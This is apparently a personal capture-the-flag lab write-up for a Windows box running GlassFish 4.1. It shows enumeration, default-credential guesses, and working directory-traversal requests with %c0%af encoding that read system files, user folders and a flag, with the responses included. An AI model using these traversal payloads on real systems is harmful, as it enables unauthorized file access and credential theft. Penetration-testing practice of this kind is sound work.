Fish - Writeup - Konstantinovitz

## Enumeration - 4848/tcp open http Sun GlassFish Open Source Edition - http-title login - 8080 - http Sun GlassFish - http-title: Data Web - 445 - SMB - no null session - no guest login - 3389 - Microsoft Terminal Services ### HTPP - `8080` Mostly appears static. Got a single input form here. Should check whether "they" click links. ![[Pasted image 20250331184721.png]] Send button is fake/purely graphical... Performing directory enumeration using `ffuf` yields nada either: ``` ╭─[λ]-[/targets/fish]-[192.168.188.168] ╰─> ffuf -u http://$RHOST:8080/FUZZ -c -w /arsenal/wordlists/raft-large-files.txt -mc 200,301,302 ``` ### http://192.168.188.168:4848/j_security_check - Admin Console ![[Pasted image 20250331185209.png]] ![[Pasted image 20250331185228.png]] **Credentials:** - `admin:admin` - `admin:` - `admin:adminadmin` No love there **Directory Enumeration:** Just yields 200 to whatever you throw at it, useless with false positives here... **Version enumeration & CVE lookup** ![[Pasted image 20250331185600.png]] According to `nmap` we be dealin with `v4.1`: ``` 4848/tcp open http Sun GlassFish Open Source Edition 4.1 |_http-favicon: Unknown favicon MD5: 7EA0C3CBA45327AA04BCD69BE9754B9E | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: GlassFish Server Open Source Edition 4.1 |_http-title: Login ``` ![[Pasted image 20250331185858.png]] `searchsploit` reveals a number of potential vulnerabilities, all seems related to file traversal of some sort. We'll copy over the non metasploit version: ``` ╭─[λ]-[/targets/fish]-[192.168.188.168] ╰─> searchsploit -m 39441 ``` ``` GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini Host: 192.168.188.168:4848 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: keep-alive ``` Yields a response: ``` HTTP/1.1 200 OK Server: GlassFish Server Open Source Edition 4.1 X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/AdoptOpenJDK/1.8) Last-Modified: Sat, 30 Oct 2021 01:57:49 GMT ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 ``` https://www.exploit-db.com/exploits/39441 So path traversal works. Question is how to leverage that shit for further axxs? At this point I'm taking a break to get snaxks... Not sure what file to request? Refer to [[Path Traversal]] and [[Sensitive File Paths - Windows]]. `GET /theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afusers/` Gets us the user directory: ``` HTTP/1.1 200 OK Server: GlassFish Server Open Source Edition 4.1 X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/AdoptOpenJDK/1.8) Last-Modified: Sat, 30 Oct 2021 02:23:43 GMT Administrator All Users arthur Default Default User desktop.ini Public ``` `/theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afusers/arthur` Gets us the home directory of `arthur`: ``` 3D Objects AppData Application Data Contacts Cookies Desktop Documents Downloads Favorites Links Local Settings Music My Documents NetHood NTUSER.DAT ntuser.dat.LOG1 ntuser.dat.LOG2 NTUSER.DAT{b98f8778-d034-11eb-b45f-0050568a4226}.TM.blf NTUSER.DAT{b98f8778-d034-11eb-b45f-0050568a4226}.TMContainer00000000000000000001.regtrans-ms NTUSER.DAT{b98f8778-d034-11eb-b45f-0050568a4226}.TMContainer00000000000000000002.regtrans-ms ntuser.ini OneDrive Pictures PrintHood Recent Saved Games Searches SendTo Start Menu Templates Videos ``` We can get NTUSER.DAT, but I've gotten no idea how to decipher it.... I'm guessing we need to get some kind of credentials for RDP... For some quick points we can go ahead and grab `local.txt`: `/theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afusers/arthur/Desktop/local.txt` ``` c02c7431624d658c18d436c5de0e4062 ``` Possible password at: `GET /theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afusers/arthur/Documents/TotalAV/PasswordVault/` `42590410` My theory at this point is that we would have to somehow download the password vault and then attempt to crack it?? ## Lessons Learned - More windows file system drilling - More ffuf confidence - Didnt have remote desktop installed on my new system.... - Comletely missed the "Synaman" server during my enumeration - guess i forgot to "scan all ports" - we'll need an RDP fix so we can hit the remote hosts directly from my admin machine too - it's gonna be weird to do like RPD->X so we'll need to be able to forward connections from my local machine onto the target system....